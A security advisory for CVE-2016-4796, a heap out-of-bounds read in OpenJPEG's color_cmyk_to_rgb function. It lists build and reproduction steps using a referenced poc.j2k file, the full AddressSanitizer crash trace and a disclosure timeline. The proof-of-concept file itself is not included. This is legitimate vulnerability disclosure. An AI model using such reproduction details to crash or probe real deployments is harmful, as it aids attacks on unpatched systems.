CVE-2016-4796 OpenJPEG color_cmyk_to_rgb Out-of-Bounds Read Vulnerability

# CVE-2016-4796 OpenJPEG color_cmyk_to_rgb Out-of-Bounds Read Vulnerability ## 1. About OpenJPEG OpenJPEG is an open-source JPEG 2000 codec written in C language. It's widely used in lots of Linux OSes such as Ubuntu, RedHat, Debian, Fedora, and so on. The official repository of the OpenJPEG project is available at [GitHub](https://github.com/uclouvain/openjpeg). ## 2. Credit This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB. ## 3. Testing Environments + **OS**: Ubuntu + **OpenJPEG**: [44a499f](https://github.com/uclouvain/openjpeg/archive/44a499f2acf10b55172d07abf387e5a579a585f7.zip) (Master version before May/6/2016) + **Compiler**: Clang + **CFLAGS**: ``-g -O0 -fsanitize=address`` ## 4. Reproduce Steps Please copy file ``poc.j2k`` to directory ``openjpeg/bin`` before executing ``opj_decompress``. ``` wget https://github.com/uclouvain/openjpeg/archive/44a499f2acf10b55172d07abf387e5a579a585f7.zip unzip -q 44a499f2acf10b55172d07abf387e5a579a585f7.zip mv openjpeg-44a499f2acf10b55172d07abf387e5a579a585f7 openjpeg cd openjpeg export CC='/usr/bin/clang -g -O0 -fsanitize=address' cmake . make cd bin ./opj_decompress -o image.pgm -i poc.j2k ``` ## 5. Vulnerability Details AddressSanitizer output the following exception information. ``` ==118074==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eed4 at pc 0x000000531212 bp 0x7ffce9cd43c0 sp 0x7ffce9cd43b8 READ of size 4 at 0x60200000eed4 thread T0 #0 0x531211 in color_cmyk_to_rgb openjpeg/src/bin/common/color.c:872:15 #1 0x4f20c1 in main openjpeg/src/bin/jp2/opj_decompress.c:1378:4 #2 0x7f3e59d9082f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291 #3 0x41a978 in _start (openjpeg/bin/opj_decompress+0x41a978) 0x60200000eed4 is located 0 bytes to the right of 4-byte region [0x60200000eed0,0x60200000eed4) allocated by thread T0 here: #0 0x4bac30 in calloc (openjpeg/bin/opj_decompress+0x4bac30) #1 0x7f3e5b68cc44 in opj_calloc openjpeg/src/lib/openjp2/opj_malloc.c:203:10 #2 0x7f3e5b60032a in opj_j2k_update_image_data openjpeg/src/lib/openjp2/j2k.c:8221:62 #3 0x7f3e5b5ffd36 in opj_j2k_decode_tiles openjpeg/src/lib/openjp2/j2k.c:9764:23 #4 0x7f3e5b5c87ed in opj_j2k_exec openjpeg/src/lib/openjp2/j2k.c:7350:41 #5 0x7f3e5b5db8be in opj_j2k_decode openjpeg/src/lib/openjp2/j2k.c:9955:15 #6 0x7f3e5b616b3e in opj_jp2_decode openjpeg/src/lib/openjp2/jp2.c:1492:8 #7 0x7f3e5b633806 in opj_decode openjpeg/src/lib/openjp2/openjpeg.c:412:10 #8 0x4f166f in main openjpeg/src/bin/jp2/opj_decompress.c:1332:10 #9 0x7f3e59d9082f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow openjpeg/src/bin/common/color.c:872:15 in color_cmyk_to_rgb Shadow bytes around the buggy address: 0x0c047fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa[04]fa fa fa fd fd 0x0c047fff9de0: fa fa fd fd fa fa 00 fa fa fa fd fd fa fa 04 fa 0x0c047fff9df0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==118074==ABORTING ``` ## 6. Timeline + 2016.05.05 - Found + 2016.05.06 - Reported to OpenJPEG via [Issue774](https://github.com/uclouvain/openjpeg/issues/774) + 2016.05.09 - Fixed